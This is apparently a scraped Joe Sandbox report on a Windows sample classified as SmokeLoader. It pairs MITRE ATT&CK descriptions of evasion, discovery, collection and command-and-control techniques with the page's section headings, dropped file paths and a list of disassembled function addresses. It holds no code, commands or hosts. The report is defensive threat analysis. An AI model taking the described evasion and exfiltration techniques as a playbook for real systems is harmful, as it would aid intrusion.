Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LgigaSKsL6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\A869.exe

C:\Users\user\AppData\Roaming\ajvrjra

C:\Users\user\AppData\Roaming\vsvrjra

C:\Users\user\AppData\Roaming\vsvrjra:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
LgigaSKsL6.exe

Function 00415C20 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 271
filelibrarypipeCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 02C4A856 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02FC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 004158A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 02FC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON